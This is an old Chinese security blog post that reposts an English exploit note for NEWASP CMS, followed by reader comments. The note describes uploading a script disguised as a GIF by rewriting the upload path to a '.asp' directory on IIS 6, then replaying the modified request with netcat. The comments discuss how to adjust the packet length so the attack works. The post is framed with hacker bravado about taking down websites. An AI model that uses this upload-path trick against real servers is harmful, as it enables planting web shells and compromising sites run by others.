NEWASP 新云CMS BUG

2007/04/28 8:22 | 鬼仔 | 技术文章 | 占个座先

鬼仔注:刚在H4x0r那里看到的,很简单的英文,不会英文的,根据里面几个URL和关键字也应该能看出来什么意思,必须要求IIS 6.0,跟前段时间动易那个一样,利用Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷。不过新云的这个好像需要用NC提交,以达到修改上传路径的目的。

来源:H4x0r's Blog

HACK..
JUST,DO.IT!
I LOVE HACKED DOWN WEBSITE. HOHO~~~~~

This is BUG Only For > IIS 6.0 (Windows 2003 )

EXPLIOT:

HTTP://WWW.****.COM/(UPLOAD.ASP)

You can change upload is filepath…. -_-!!

(exmple:upload/2007148685.gif)

changed upload/qq148685.asp/200714865.gif

200714865.gif is your eval javscrpit !

In the end

NC.EXE WWW.****.COM 80 <C:\NEWASP.TXT

HOHO~~~~

Tags:

相关日志

楼被抢了 8 层了... 抢座Rss 2.0或者 Trackback

  • cxh116 | 2007-04-29 12:46 | #

    不知道NEWASP.TXT复制了包的数据“要改那地方啊~~~

    回复该留言
  • 异袭狂封 | 2007-04-30 03:45 | #

    昏迷 !!! nc提交包内容改了,不改长度能提交上去?????

    回复该留言
  • hellboy | 2007-04-30 06:13 | #

    说的太含糊了,也不知道具体怎么利用?

    回复该留言
  • 鬼仔 | 2007-04-30 08:16 | #

    修改上传文件的路径
    长度一定要修改的
    @hellboy 很多东西都是从微软的安全公告中挖出来的

    回复该留言
  • 小妖 | 2007-04-30 09:47 | #

    看它的提示是改包中的
    upload/2007148685.gif

    upload/qq148685.asp/200714865.gif
    我猜,包的长度也要改吧?!

    回复该留言
  • night | 2007-04-30 10:54 | #

    貌似,不需要改长度,我昨天也是不知道改哪里,没有找到,应该改的地方,望高手指点!
    :grin:

    回复该留言
  • cxh116 | 2007-05-01 03:11 | #

    唉“还是搞不懂“把新云下载来看了下“`在USER那个上传有权限“其余的好像要拿到后台才可以~~~~在USER那个上传文件抓包没有看到这样upload/2007148685.gif的上传路径“郁闷~~

    回复该留言
  • night | 2007-05-02 02:17 | #

    确实不用改长度,我怕麻烦。直接计算好改后的长度和原来的一样,就可以不用改了啊!

    昏迷 !!! nc提交包内容改了,不改长度能提交上去?????

    并非nc提交就非得改长度的。

    回复该留言

发表评论